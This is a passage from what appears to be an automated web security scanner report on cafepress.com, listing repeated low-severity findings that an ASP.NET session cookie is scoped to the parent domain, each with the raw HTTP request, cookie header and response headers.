__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.55. http://www.cafepress.com/make/custom-hats previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-hats

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 54657
Date: Sun, 26 Dec 2010 13:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.56. http://www.cafepress.com/make/custom-hoodies-sweatshirts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-hoodies-sweatshirts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 69583
Date: Sun, 26 Dec 2010 13:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.57. http://www.cafepress.com/make/custom-ipad-case previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-ipad-case

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.58. http://www.cafepress.com/make/custom-iphone-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-iphone-cases

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.59. http://www.cafepress.com/make/custom-mugs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-mugs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.60. http://www.cafepress.com/make/custom-stickers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-stickers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.61. http://www.cafepress.com/make/custom-stockings previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-stockings

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.62. http://www.cafepress.com/make/custom-t-shirts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-t-shirts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
